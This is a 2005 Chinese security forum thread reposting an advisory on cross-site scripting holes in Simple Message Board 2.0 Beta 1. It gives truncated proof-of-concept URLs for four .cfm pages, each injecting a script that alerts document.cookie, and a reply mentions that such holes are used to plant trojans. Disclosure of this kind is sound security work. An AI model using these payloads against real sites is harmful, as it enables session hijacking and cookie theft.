邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [转载]XSS in forums Simple Message Board Version 2.0 Beta 1

‹‹ 上一主题 | 下一主题 ››

发新话题

打印

[转载]XSS in forums Simple Message Board Version 2.0 Beta 1

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6825
精华: 834
积分: 36073
阅读权限: 255
性别: 男
来自: 中国
在线时间: 591 小时
注册时间: 2004-6-25
最后登录: 2008-10-12

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2005-7-18 15:32 只看该作者

[转载]XSS in forums Simple Message Board Version 2.0 Beta 1

文章作者：rUnViRuS
信息来源：www.security-arab.com

xss in forums
Simple Message Board Version 2.0 Beta 1
Powered by Man and Machine, Ltd
Exploit

XSS in forum.cfm

http://www.example.com/forum/for ... gt;JavaScript:alert(document.cookie);</scrip
t>

XSS in user.cfm

http://www.example.com/forum/use ... gt;JavaScript:alert(document.cookie);</script>

XSS in thread.cfm

http://www.example.com/forum/thr ... gt;JavaScript:alert(document.cookie);</scri
pt>

XSS IN search.cfm

http://www.example.com/forum/sea ... gt;JavaScript:alert(document.cookie);<
/script>

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

hak_ban[HSG]

晶莹剔透§烈日灼然

Rank: 1

E.S.T论坛贵宾

帖子: 137
精华: 4
积分: 3301
阅读权限: 60
性别: 男
在线时间: 0 小时
注册时间: 2004-10-21
最后登录: 2005-7-29

发短消息
加为好友
当前离线

沙发大中小发表于 2005-7-19 15:51 只看该作者

不是吧~?~老大~~~还要翻译吖~?

Simple Message Board 是俄罗斯的一个小型论坛程序~
在forum.cfm等等页面存在着CSS/XSS跨站脚本漏洞攻击
通常在国内都是用来进行挂马和小破坏~

白痴狗将会离我们而去, 需要怀念白痴狗的朋友, 请发消息给白痴狗的QQ (PS:白痴狗QQ会永远在网上开着)

TOP

‹‹ 上一主题 | 下一主题 ››

发新话题

邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [转载]XSS in forums Simple Message Board Version 2.0 Beta 1